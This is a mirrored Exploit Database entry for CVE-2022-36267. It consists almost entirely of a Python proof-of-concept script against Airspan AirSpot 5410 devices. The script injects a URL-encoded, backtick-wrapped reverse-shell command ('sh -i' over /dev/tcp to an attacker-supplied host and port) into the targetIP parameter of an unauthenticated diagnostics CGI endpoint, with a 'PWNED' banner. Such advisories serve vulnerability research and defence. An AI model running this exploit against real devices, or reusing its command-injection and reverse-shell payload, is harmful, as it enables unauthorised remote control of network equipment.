Airspan AirSpot 5410 version 0.3.4.1 – Remote Code Execution (RCE)

• Exploit Database
• 13 阅读

• 作者： Samy Younsi
  日期： 2022-09-20
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/51011/

• # Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
  # Date: 7/26/2022
  # Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
  # Vendor Homepage: https://www.airspan.com/
  # Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
  # Version: 0.3.4.1-4 and under.
  # Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
  # CVE : CVE-2022-36267
  
  from __future__ import print_function, unicode_literals
  import argparse
  import requests
  import urllib3
  urllib3.disable_warnings()
  
  def banner():
  airspanLogo = """ 
  ,-.
   / \`.__..-,O
  : \ --''_..-'.'
  |. .-' `. '.
  : . .`.'
   \ `./..
  \`. ' .
   `, `. \
  ,|,`.`-.\
   '.||``-...__..-`
  || Airspan 
  |__| AirSpot 5410
  /||\ PWNED x_x
   //||\\
  // || \\
   __//__||__\\__
  '--------------'Necrum Security Labs
  
  \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m 
  FOR EDUCATIONAL PURPOSE ONLY. 
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))
  
  def pingWebInterface(RHOST, RPORT):
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
  response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
  if response.status_code != 200:
  print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
  exit()
  print('[INFO] Airspan device web interface seems reachable!')
  except:
  print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
  exit()
  
  
  def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
  print('[INFO] Executing reverse shell...')
  response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
  print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
  return
  except Exception as e:
  print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}").format(LHOST, LPORT)
  return False
  
  def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)
  
  
  if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploit an nauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()